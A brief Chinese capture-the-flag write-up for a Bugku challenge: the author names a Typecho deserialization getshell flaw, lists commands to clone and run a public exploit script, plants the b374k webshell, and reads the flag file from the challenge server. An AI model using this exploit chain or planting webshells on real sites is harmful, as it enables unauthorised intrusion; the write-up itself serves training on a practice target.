bugku 小明的博客

首先打開是一個(gè)博客的樣子,里面寫有提示

那么搜一下吧,發(fā)現(xiàn)這是typecho有g(shù)etshell的漏洞,利用步驟:

git clone https://github.com/BennyThink/Typecho_deserialization_exploit

cd Typecho_deserialization_exploit

python exp.py

按使用步驟寫入webshell,之后可以進(jìn)入b374k.php,可以看到文件目錄,看到一個(gè)與flag有關(guān)的文件,直接在目錄上http://123.206.87.240:9003/文件名,就可以獲得flag。

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容